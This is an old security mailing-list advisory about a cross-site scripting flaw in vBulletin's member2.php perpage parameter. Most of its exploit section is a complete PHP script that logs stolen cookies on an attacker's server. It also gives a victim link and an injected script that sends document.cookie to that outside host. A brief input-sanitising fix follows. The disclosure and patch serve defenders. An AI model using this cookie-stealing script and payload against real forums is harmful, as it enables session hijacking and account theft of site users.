[UNIX] vBulletin XSS Injection Vulnerability (perpage)

From: support@securiteam.com
Date: 11/22/02

  • Next message: support@securiteam.com: "[TOOL] IP Sentinel, Local Network Watch Guard"
    From: support@securiteam.com
    To: list@securiteam.com
    Date: 23 Nov 2002 00:31:14 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      vBulletin XSS Injection Vulnerability (perpage)
    ------------------------------------------------------------------------

    SUMMARY

    vBulletin is a powerful and widely used bulletin board system, based on
    PHP language and MySQL database. Sp IC discovered lately a Cross-Site
    Scripting issue that would allow attackers to inject maleficent codes into
    the pages and execute it on the client's browser.

    DETAILS

    Vulnerable systems:
     * Jelsoft vBulletin 2.2.9 Release Candidate and prior

    Vulnerable systems:
     * Jelsoft vBulletin 2.2.9 Final

    At "Start View Threads" block in member2.php, there is a variable
    [$perpage] controls the way of reciting subscribed threads, therefore an
    integer value [Which refers to the number of threads that will be
    displayed each page] should be assigned for the variable. However, we
    should realize that the value of this variable is added to a query that
    will fetch records from the database, so if a client gave a wrong value to
    $perpage, the script will output an error message [Due to script doesn't
    checks on inputs and filter it], printing the query and revealing its
    mistake.

    Exploit:
     - Run this script on some host:
        <?PHP
          // vBulletin XSS Injection Vulnerability: Exploit
          // ---
          // Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
          // Descrption: Fetching vBulletin's cookies and storing it into a
    log file.

          // Variables:

          $LogFile = "Cookies.Log";

          // Functions:
          /*
          If ($HTTP_GET_VARS['Action'] = "Log") {
              $Header = "<!--";
              $Footer = "--->";
          }
          Else {

               $Header = "";
               $Footer = "";
          }
          Print ($Header);
          */
          Print ("<Title>vBulletin XSS Injection Vulnerability:
    Exploit</Title>");
          Print ("<Pre>");
          Print ("<Center>");
          Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
          Print ("Coded By: <B><A
    Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
          /*
          Print ($Footer);
          */

          Switch ($HTTP_GET_VARS['Action']) {
              Case "Log":

                     $Data = $HTTP_GET_VARS['Cookie'];
                     $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen
    (DecHex (MD5 (NULL))))));
                     $Log = FOpen ($LogFile, "a+");
                             FWrite ($Log, Trim ($Data) . "\n");
                             FClose ($Log);
                             Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0;
    URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
              Break;
                    Case "List":
                     If (!File_Exists ($LogFile) || !In_Array ($Records)) {
                         Print ("<Br><Br><B>There are No
    Records</B></Center></Pre>");
                         Exit ();
                     }
                     Else {
                         Print ("</Center></Pre>");
                         $Records = Array_UniQue (File ($LogFile));
                                      Print ("<Pre>");
                                      Print ("<B>.:: Statics</B>\n");
                         Print ("\n");
                                      Print ("o Logged Records : <B>" . Count
    (File ($LogFile)) . "</B>\n");
                         Print ("o Listed Records : <B>" . Count ($Records) .
    " </B>[Not Counting Duplicates]\n");
                         Print ("\n");
                 
                         Print ("<B>.:: Options</B>\n");
                         Print ("\n");
                 
                         If (Count (File ($LogFile)) > 0) {
                             $Link['Download'] = "[<A Href=\"" . $LogFile .
    "\">Download</A>]";
                         }
                         Else{
                             $Link['Download'] = "[No Records in Log]";
                         }

                         Print ("o Download Log : " . $Link['Download'] .
    "\n");
                         Print ("o Clear Records : [<A Href=\"" .
    $SCRIPT_PATH. "?Action=Delete\">Y</A>]\n");
                         Print ("\n");
                         Print ("<B>.:: Records</B>\n");
                         Print ("\n");

                         While (List ($Line[0], $Line[1]) = Each ($Records)) {
                             Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
                         }
                     }

                     Print ("</Pre>");
              Break;
              Case "Delete":
                  @UnLink ($LogFile);
                  Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>")
    Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
                  Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
    $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
              Break;
          }
        ?>

     - Give a victim this link:
    member2.php?s=[Session]&action=viewsubscription&perpage=[Script Code]

     - Note: You can replace [Script Code] with:
    --><Script>location='http://[Exploit
    Path]?Action=Log&Cookie='+(document.cookie);</Script>

     - Then go to http://[Exploit Path]?Action=List

    Solution:
     - Under [ // set defaults ] on line 304, paste this code:

            If (IsSet ($perpage) && $perpage != Is_Int($perpage)) {
                $perpage = IntVal ($perpage);
            }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:speedicnet@hotmail.com>
    Sp.IC and <mailto:scottmacvicar@ntlworld.com> Scott MacVicar.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.